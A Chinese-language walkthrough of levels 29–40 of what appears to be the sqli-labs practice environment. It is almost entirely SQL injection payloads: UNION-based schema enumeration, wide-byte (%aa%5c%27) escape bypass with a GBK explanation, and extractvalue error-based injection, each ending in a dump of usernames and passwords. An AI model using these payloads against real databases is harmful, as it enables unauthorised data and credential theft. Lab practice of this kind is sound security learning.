29、第二十九关
id=1'
data:image/s3,"s3://crabby-images/8cc48/8cc484af7d480735dc1584996c115aa70e906c0c" alt=""
id=1''
data:image/s3,"s3://crabby-images/7ea31/7ea315143eb2f5e5a74c4ab25a43692c74abc364" alt=""
尝试发现是单引号闭合,
-1' union select 1,2,3--+
data:image/s3,"s3://crabby-images/5c0b5/5c0b53be8c5909322deddf92c02de14cbd98e7c0" alt=""
-1' union select 1,2,database()--+
data:image/s3,"s3://crabby-images/4eb7f/4eb7f41d141f20e5f813ce731617036dea205e09" alt=""
-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
data:image/s3,"s3://crabby-images/87325/87325ef84f2de6f52fabc90d88e09ff5e7740125" alt=""
-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+
data:image/s3,"s3://crabby-images/c1e20/c1e20fa5337b17f3cb0c8d5a54a4cf70ac9d0a42" alt=""
-1' union select 1,2,(select group_concat(username,'~',password) from security.users)--+
data:image/s3,"s3://crabby-images/b5a79/b5a79748456822fd93f80cf80b7424511d5560c3" alt=""
30、第三十关
id=1"
data:image/s3,"s3://crabby-images/c4d63/c4d63f6992a4c9a99f97fc5e3935563f1530f855" alt=""
id=1""
data:image/s3,"s3://crabby-images/057db/057dbb9d6e92ec885a0b43955310ecc882c69198" alt=""
探测位置:-1" union select 1,2,3--+
data:image/s3,"s3://crabby-images/a45b5/a45b58e71597da0540cb765b20bc322032339022" alt=""
POC:-1" union select 1,2,database()--+
data:image/s3,"s3://crabby-images/8423a/8423af53d45457464d1e70d954d23a33236bedbb" alt=""
POC:-1" union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
data:image/s3,"s3://crabby-images/c0441/c0441f894c0222a828590bf866aec65c44367f08" alt=""
POC:-1" union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+
data:image/s3,"s3://crabby-images/15b4f/15b4f67bddef9decb4fe61b6fe4b188e6a73b5c0" alt=""
POC:id=-1" union select 1,2,(select group_concat(username,'~',password) from security.users)--+
data:image/s3,"s3://crabby-images/d07b5/d07b55426c0a1b62618064a79b122de06a15bc1a" alt=""
31、第三十一关
id=1"
data:image/s3,"s3://crabby-images/09e79/09e79d540f3a5b513f97705d32e83ad49969400b" alt=""
id=1""
data:image/s3,"s3://crabby-images/28350/283506dbf901345f7876342a0e8290a602703d47" alt=""
-1") union select 1,2,3--+
data:image/s3,"s3://crabby-images/1eb4c/1eb4c3377268511fda56b5ec80aad8c0c8090a61" alt=""
-1") union select 1,2,database()--+
data:image/s3,"s3://crabby-images/8eb2c/8eb2c04ed1669e527620dcba4c39760e01606184" alt=""
-1") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
data:image/s3,"s3://crabby-images/774dc/774dc1966c46c8419dda946c7a4d82b3db99a009" alt=""
-1") union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+
data:image/s3,"s3://crabby-images/82ad1/82ad156203b24b4ad6b68513c297308a4531d0ce" alt=""
-1") union select 1,2,(select group_concat(username,'~',password) from security.users)--+
data:image/s3,"s3://crabby-images/aaa01/aaa017bbfe867cc9e90afab44f1db7a7c98cedbd" alt=""
32、第三十二关
id=1'
data:image/s3,"s3://crabby-images/4c9ec/4c9ecb819ebb155bc4d5b77d0d15f79a508f4577" alt=""
这关是单引号闭合,但是单引号被转译成\'了,想办法去掉单引号,可用宽字节注入
MySQL 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如 %aa%5c 就是一个 汉字。因为过滤方法主要就是在敏感字符前面添加 反斜杠 \,所以这里想办法干掉反斜杠即可。
%df 吃掉
具体的原因是 urlencode(') = %5c%27,我们在 %5c%27 前面添加 %df,形 成 %df%5c%27,MySQL 在 GBK 编码方式的时候会将两个字节当做一个汉字,这个时候就把 %df%5c 当做是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。
-1%aa%5c%27%20union select 1,2,3 --+
data:image/s3,"s3://crabby-images/d58bd/d58bdeb7ef6be1b08b36e783dea92dd5ce24e49d" alt=""
-1%aa%5c%27%20union select 1,2,database() --+
data:image/s3,"s3://crabby-images/6fb4d/6fb4ddf380cf5710e3929ed9739507aabdc4ff37" alt=""
-1%aa%5c%27%20union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
data:image/s3,"s3://crabby-images/d58c2/d58c2bd0983579d470f40b7cf47e26b1f39f37e2" alt=""
-1%aa%5c%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=(select%20right(group_concat(table_name),5)%20from%20information_schema.columns%20where%20table_schema=database()))--+
data:image/s3,"s3://crabby-images/b983d/b983da407174ae0d2cddcf306d50652138d65651" alt=""
-1%aa%5c%27%20union%20select%201,2,group_concat(username,0,password)%20from%20users--+
data:image/s3,"s3://crabby-images/1b535/1b5359bcfaaccc8cc205ba6d1dc27565cbcdf971" alt=""
33、第三十三关
data:image/s3,"s3://crabby-images/8a4c0/8a4c0ab12ce56406d32c594c9546fce811a7a362" alt=""
这关也是单引号闭合,但是引号被转译了和32关一样,用宽字节
-1%aa%5c%27 union select 1,2,3--+
data:image/s3,"s3://crabby-images/2a03e/2a03e32a0410e631c96444ba4cef6612089ad15a" alt=""
-1%aa%5c%27 union select 1,2,database()--+
data:image/s3,"s3://crabby-images/b7700/b7700c0d335b8e21f8f0116f72c833fbb8fb5af9" alt=""
-1%aa%5c%27 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
data:image/s3,"s3://crabby-images/89342/8934234aa28978a3faf117e956f299bb76e3febc" alt=""
-1%aa%5c%27 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select right(group_concat(table_name),5) from information_schema.tables where table_schema=database()))--+
data:image/s3,"s3://crabby-images/ce970/ce9701813bb34e071339380c141265782944753b" alt=""
-1%aa%5c%27 union select 1,2,(select group_concat(username,0,password) from security.users)--+
data:image/s3,"s3://crabby-images/385a9/385a9ab00d68940bc60e53784edbbc96a21fed4f" alt=""
34、第三十四关
data:image/s3,"s3://crabby-images/a99c7/a99c714c200a402ad34a9fb738b374584f1c5554" alt=""
这关也是引号被转译,试一下宽字节注入,发现有报错信息,可以用报错注入
uname=admin%aa%5c%27%20and extractvalue(1,concat(0x7e,database(),0x7e))--+
data:image/s3,"s3://crabby-images/ae967/ae967a7be0bc828eca337955208a4d33f73f2d92" alt=""
admin%aa%5c%27%20and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
data:image/s3,"s3://crabby-images/7c634/7c634bab1a5ccf5c76d60dd48a068912b773840e" alt=""
admin%aa%5c%27%20and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select right(group_concat(table_name),5) from information_schema.tables where table_schema=database())),0x7e))--+
data:image/s3,"s3://crabby-images/fa65b/fa65b037e055b7f84a0a2b588eabf8c0dda38e51" alt=""
admin%aa%5c%27%20and extractvalue(1,concat(0x7e,(select group_concat(username,0,password) from security.users)))--+
data:image/s3,"s3://crabby-images/2f875/2f8750e5c515d813238178ab60143e85fc85e6b1" alt=""
35、第三十五关
-1 union select 1,2,3--+
data:image/s3,"s3://crabby-images/84d51/84d51586a96158f91ca18a7738a430fc18fd10e2" alt=""
-1 union select 1,2,database()--+
data:image/s3,"s3://crabby-images/a2fea/a2fea0712cc25917e9805a3977deb797f386d233" alt=""
-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
data:image/s3,"s3://crabby-images/d4584/d4584c0da348637bed1cd8539516089eaefe0f8f" alt=""
-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select right(group_concat(table_name),5) from information_schema.tables where table_schema=database()))--+
data:image/s3,"s3://crabby-images/59d05/59d050eca742348ccc767cb017adf98ec5cebe5f" alt=""
-1 union select 1,2,(select group_concat(username,0,password) from security.users)--+
data:image/s3,"s3://crabby-images/30093/30093062182ba665a321564302c7e46664083478" alt=""
36、第三十六关
-1%aa%5c%27 union select 1,2,3--+
data:image/s3,"s3://crabby-images/d0eb7/d0eb7e40a5fc2e31938d46e75b66a058d19a8595" alt=""
-1%aa%5c%27 union select 1,2,database()--+
data:image/s3,"s3://crabby-images/c9a8c/c9a8cc04e07e18964c6090af46a30db7208ff832" alt=""
-1%aa%5c%27 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
data:image/s3,"s3://crabby-images/2395e/2395e15c254c4cefe1aa0d88f65a09810527af9b" alt=""
-1%aa%5c%27 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select right(group_concat(table_name),5) from information_schema.tables where table_schema=database()))--+
data:image/s3,"s3://crabby-images/584d3/584d3e6ecb8793ff81d2ea5ff4f0f59e9d8ff6f4" alt=""
-1%aa%5c%27 union select 1,2,(select group_concat(username,0,password) from security.users)--+
data:image/s3,"s3://crabby-images/e0b0d/e0b0dbc16df028f9cb890a9506e3b855c953cb6f" alt=""
37、第三十七关
admin%aa%5c%27and+extractvalue(1,concat(0x7e,database()))--+
data:image/s3,"s3://crabby-images/adf16/adf16bb8eb23ee89ec3a0a4524653f019d38cd32" alt=""
admin%aa%5c%27and+extractvalue(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=database())))--+
data:image/s3,"s3://crabby-images/21add/21addbb313f84430f84556d30ce736a8b445d5b4" alt=""
admin%aa%5c%27and+extractvalue(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns where table_schema=database() and+table_name=(select+right(group_concat(table_name),5) from information_schema.tables where table_schema=database()))))--+
data:image/s3,"s3://crabby-images/a8c39/a8c39b498e80e318472e588fe1b698ae4989ee01" alt=""
admin%aa%5c%27and+extractvalue(1,concat(0x7e,(select+group_concat(username,0,password)+from+security.users)))--+
data:image/s3,"s3://crabby-images/ec514/ec514f9dbab94b7eea7588b2136ff5b7a94a00a1" alt=""
38、第三十八关
单引号闭合-1' union select 1,2,3--+
data:image/s3,"s3://crabby-images/d10cd/d10cd5446ca1e0ba39ad9082238fa6fa7772a133" alt=""
-1' union select 1,2,database()--+
data:image/s3,"s3://crabby-images/aba3f/aba3f8bd3fa675649ec019b20883a9d9bccf2386" alt=""
-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
data:image/s3,"s3://crabby-images/169c5/169c54ac97e07258a4088bbd6fa201237910641c" alt=""
-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+
data:image/s3,"s3://crabby-images/9afcd/9afcd1d4f99fff274ebb4e3f64635c1fdef2f31a" alt=""
-1' union select 1,2,(select group_concat(username,'~',password) from security.users) --+
data:image/s3,"s3://crabby-images/ff6a1/ff6a185ae9e8408d0523715c00f191e13148ca95" alt=""
39、第三十九关
-1 union select 1,2,3--+
data:image/s3,"s3://crabby-images/2008b/2008bde7ea20a11eb483316172a7ece6c9760f28" alt=""
-1 union select 1,2,database()--+
data:image/s3,"s3://crabby-images/264e5/264e5f880b4dee8e38bce0b6c4f4f991cb5ee415" alt=""
-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+
data:image/s3,"s3://crabby-images/185df/185dfc7c19789af7c4cbe42bbc75418729fe8c0a" alt=""
-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+
data:image/s3,"s3://crabby-images/4b0b3/4b0b3ee8220fc474b44a98c207191f89d6ec3be1" alt=""
-1 union select 1,2,(select group_concat(username,'~',password) from security.users)--+
data:image/s3,"s3://crabby-images/64d25/64d25806bb94e7d3888a6d0422671f29cfa77979" alt=""
40、第四十关
-1') union select 1,2,3--+单引号加括号闭合
data:image/s3,"s3://crabby-images/d5afa/d5afaa8383af3ccc74f3235c3b97db35d8ac9683" alt=""
-1') union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
data:image/s3,"s3://crabby-images/67381/67381ce239d319ddb734f87af2b84b52987f7d74" alt=""
-1') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+
data:image/s3,"s3://crabby-images/d01bf/d01bfa80f427e14a9674ee0a88ee465b22031951" alt=""
-1') union select 1,2,(select group_concat(username,'~',password) from security.users)--+
data:image/s3,"s3://crabby-images/357d2/357d22172ea7b51e1bcf205fdec862d323e7e9f2" alt=""